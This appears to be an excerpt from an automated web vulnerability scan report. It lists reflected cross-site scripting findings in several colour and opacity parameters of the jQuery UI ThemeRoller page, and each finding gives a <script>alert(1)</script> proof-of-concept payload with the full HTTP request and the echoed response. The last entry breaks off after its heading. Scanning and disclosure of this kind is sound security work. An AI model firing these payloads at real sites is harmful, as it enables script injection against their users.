2.124. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5f75"><script>alert(1)</script>80a5b434414 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

2.125. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afeb"><script>alert(1)</script>e6e1ca26fde was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee7afeb"><script>alert(1)</script>e6e1ca26fde&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

2.126. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bcd"><script>alert(1)</script>001f9ca1294 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada44bcd"><script>alert(1)</script>001f9ca1294&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

2.127. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb02"><script>alert(1)</script>ab6c9905154 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaaddb02"><script>alert(1)</script>ab6c9905154&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

2.128. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6505"><script>alert(1)</script>5dfd401df80 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaab6505"><script>alert(1)</script>5dfd401df80&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.129. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f16e"><script>alert(1)</script>1d046989701 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=658f16e"><script>alert(1)</script>1d046989701&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

2.130. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 685ca"><script>alert(1)</script>81a7908cbb4 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75685ca"><script>alert(1)</script>81a7908cbb4&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

2.131. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae3f"><script>alert(1)</script>de2a08a5946 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75fae3f"><script>alert(1)</script>de2a08a5946&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

2.132. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c84"><script>alert(1)</script>41681df22b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9536c84"><script>alert(1)</script>41681df22b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

2.133. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e7f"><script>alert(1)</script>6bb1c029358 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

